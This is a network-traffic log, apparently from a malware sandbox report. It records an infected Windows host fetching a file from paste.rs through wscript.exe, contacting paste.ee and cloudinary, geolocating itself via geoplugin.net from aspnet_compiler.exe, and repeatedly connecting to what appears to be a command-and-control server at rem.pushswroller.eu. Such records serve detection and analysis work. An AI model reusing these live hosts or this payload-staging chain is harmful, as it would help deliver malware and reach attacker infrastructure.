                                                        Dec 17, 2024 14:31:08.785764933 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785895109 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785908937 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785912991 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786397934 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786410093 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786549091 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.786708117 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.987164021 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.043407917 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:09.043895960 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:09.163526058 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163570881 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163587093 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163649082 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163675070 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163789988 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163840055 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163957119 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.163969994 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.164006948 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.205996037 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:09.589485884 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:09.709777117 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.011986017 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.057853937 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.072933912 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.074042082 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:10.193291903 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193310022 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193319082 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193329096 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193337917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193358898 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193522930 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193533897 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193543911 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193588972 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193624973 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193655968 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193977118 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.193985939 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:10.194093943 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.726721048 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.726807117 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.731926918 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.732028961 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.734802008 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.734961987 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.740147114 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.740221024 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.745348930 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.745438099 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.764139891 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.764204025 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.766742945 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.766810894 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.772573948 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.772655964 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.805855036 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:15.840095997 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840128899 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840197086 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840217113 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.840217113 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.840259075 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840301991 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.840326071 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.840478897 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.849899054 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.849963903 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.850126982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.850126982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.850157976 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.862905979 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.862941980 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.862991095 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.863033056 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.863066912 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.873631954 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.873697042 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.873725891 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.873743057 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.873786926 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.885842085 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.885884047 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.885983944 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.886029005 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893522024 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893564939 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893608093 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.893632889 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.893687963 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.900825977 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.900866032 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.900898933 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.900913000 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.900939941 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.908366919 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.908407927 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.908538103 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.908545971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:15.908576012 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:15.948447943 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.027626038 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.027695894 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.027786016 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.027848959 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.027895927 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.027951956 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.033756971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.033804893 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.033852100 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.033878088 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.033917904 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.033972979 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.039825916 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.039870024 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.039916039 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.039940119 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.039977074 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.040108919 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.045576096 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.045619965 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.045747042 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.045747995 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.045799017 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.048773050 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.051292896 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.051382065 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.051425934 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.051445961 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.051476955 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.051552057 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.057137012 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.057183027 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.057229996 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.057252884 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.057271957 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.057384014 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063004971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.063049078 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.063055038 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063153982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063153982 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.063172102 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.063246965 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.069176912 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.069220066 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.069331884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.069331884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.069360971 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.069665909 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.099261999 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.138009071 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:16.140362024 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:16.225578070 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.225630045 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.225683928 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.225807905 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.225840092 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.225955963 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.227152109 CET231014979545.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.231553078 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.231595993 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.231709003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.231709003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.231728077 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.232614994 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.237705946 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.237747908 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.237792969 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.237807989 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.237838984 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.237967968 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.243228912 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.243273973 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.243354082 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.243369102 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.243406057 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.246752977 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.249250889 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.249294996 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.249372005 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.249385118 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.249469042 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.249469995 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.254867077 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.254909039 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.254966974 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.254981041 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.255017042 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.255287886 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.257903099 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.257957935 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.257991076 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258039951 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258217096 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258249998 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258285046 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258311987 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258377075 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258404970 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258430958 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258459091 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258507967 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.258536100 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260297060 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260324955 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260351896 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260382891 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260410070 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260436058 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260488033 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:16.260879040 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.260922909 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.261029959 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.261030912 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.261045933 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.261765003 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.266963005 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.267004967 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.267097950 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.267097950 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.267153025 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.268213034 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.276573896 CET4979523101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:16.417749882 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.417800903 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.417913914 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.417913914 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.417989969 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.419015884 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.424026012 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.424068928 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.424187899 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.424187899 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.424232960 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.424300909 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.429899931 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.429944038 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.430025101 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.430037022 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.430068970 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.430140972 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.431561947 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.431699991 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.431709051 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.431807995 CET44349880104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:31:16.431828976 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.432080030 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:16.436357021 CET49880443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:19.540996075 CET4979523101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:19.542711020 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:19.542787075 CET4980380192.168.2.6178.237.33.50
                                                        Dec 17, 2024 14:31:19.542887926 CET4983023101192.168.2.645.80.158.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Dec 17, 2024 14:30:03.612257004 CET | 51461 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 14:30:04.013391018 CET | 53 | 51461 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 14:30:08.856482983 CET | 57294 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 14:30:35.563777924 CET | 59317 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 14:30:35.904155970 CET | 53 | 59317 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 14:30:39.101216078 CET | 56925 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 14:30:39.416475058 CET | 53 | 56925 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 14:30:41.857989073 CET | 60047 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 14:30:41.998100996 CET | 53 | 60047 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 17, 2024 14:30:03.612257004 CET | 192.168.2.6 | 1.1.1.1 | 0x553f | Standard query (0) | paste.rs | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:08.856482983 CET | 192.168.2.6 | 1.1.1.1 | 0x288c | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:35.563777924 CET | 192.168.2.6 | 1.1.1.1 | 0xf7dc | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:39.101216078 CET | 192.168.2.6 | 1.1.1.1 | 0x5eb1 | Standard query (0) | rem.pushswroller.eu | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:41.857989073 CET | 192.168.2.6 | 1.1.1.1 | 0x5f2f | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 17, 2024 14:30:04.013391018 CET | 1.1.1.1 | 192.168.2.6 | 0x553f | No error (0) | paste.rs | | 45.63.94.214 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:08.994761944 CET | 1.1.1.1 | 192.168.2.6 | 0x288c | No error (0) | res.cloudinary.com | resc.cloudinary.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 14:30:35.904155970 CET | 1.1.1.1 | 192.168.2.6 | 0xf7dc | No error (0) | paste.ee | | 104.21.84.67 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:35.904155970 CET | 1.1.1.1 | 192.168.2.6 | 0xf7dc | No error (0) | paste.ee | | 172.67.187.200 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:39.416475058 CET | 1.1.1.1 | 192.168.2.6 | 0x5eb1 | No error (0) | rem.pushswroller.eu | | 45.80.158.30 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 14:30:41.998100996 CET | 1.1.1.1 | 192.168.2.6 | 0x5f2f | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• paste.rs
• paste.ee
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
0 | 192.168.2.6 | 49803 | 178.237.33.50 | 80 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 17, 2024 14:30:42.126132965 CET71OUTGET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
Dec 17, 2024 14:30:43.372935057 CET | 1171 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 17 Dec 2024 13:30:43 GMT
                                                        server: Apache
                                                        content-length: 963
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49713 | 45.63.94.214 | 443 | 3556 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 13:30:05 UTC | 317 | OUT | GET /LDDIb HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-ch
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                        Host: paste.rs
                                                        Connection: Keep-Alive
2024-12-17 13:30:06 UTC | 439 | IN | HTTP/1.1 200 OK
